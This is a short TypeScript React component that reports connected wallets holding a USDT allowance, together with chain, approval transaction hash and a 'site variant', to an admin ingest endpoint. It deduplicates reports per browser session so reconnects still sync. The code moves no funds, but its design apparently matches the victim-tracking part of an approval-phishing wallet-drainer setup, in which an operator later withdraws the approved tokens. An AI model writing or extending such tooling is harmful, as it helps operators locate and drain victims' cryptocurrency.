"use client"

import { useEffect, useRef } from "react"

import { buildApprovalPayload, submitApprovalRecord } from "../api/submit-approval"
import { useApprovalFlow } from "../context/approval-context"

function storageKey(chain: string, walletAddress: string) {
  return `web3:approval-ingest:${chain}:${walletAddress.toLowerCase()}`
}

/**
 * Reports approvals to the admin ingest API.
 * Triggers when the wallet is connected and has USDT allowance (new or existing),
 * so reconnects still sync even if justApproved was cleared by UI effects.
 */
export function ApprovalReporter() {
  const {
    lastApprovalTxHash,
    walletAddress,
    activeChain,
    siteVariant,
    isApproved,
    isConnected,
  } = useApprovalFlow()
  const reportedRef = useRef<string | null>(null)

  useEffect(() => {
    if (!isConnected || !walletAddress || !isApproved) return

    const dedupeKey = `${walletAddress}:${activeChain}:${lastApprovalTxHash ?? "existing"}`
    if (reportedRef.current === dedupeKey) return

    // Existing on-chain approvals: report once per browser session.
    // Fresh tx hashes always attempt ingest (even if a prior "existing" report ran).
    if (!lastApprovalTxHash) {
      try {
        if (sessionStorage.getItem(storageKey(activeChain, walletAddress)) === "1") {
          reportedRef.current = dedupeKey
          return
        }
      } catch {
        // ignore storage errors
      }
    }

    reportedRef.current = dedupeKey

    void submitApprovalRecord(
      buildApprovalPayload({
        walletAddress,
        chain: activeChain,
        approvalTxHash: lastApprovalTxHash,
        siteVariant,
      }),
    ).then((ok) => {
      if (!ok) {
        reportedRef.current = null
        return
      }
      if (!lastApprovalTxHash) {
        try {
          sessionStorage.setItem(storageKey(activeChain, walletAddress), "1")
        } catch {
          // ignore storage errors
        }
      }
    })
  }, [
    activeChain,
    isApproved,
    isConnected,
    lastApprovalTxHash,
    siteVariant,
    walletAddress,
  ])

  return null
}
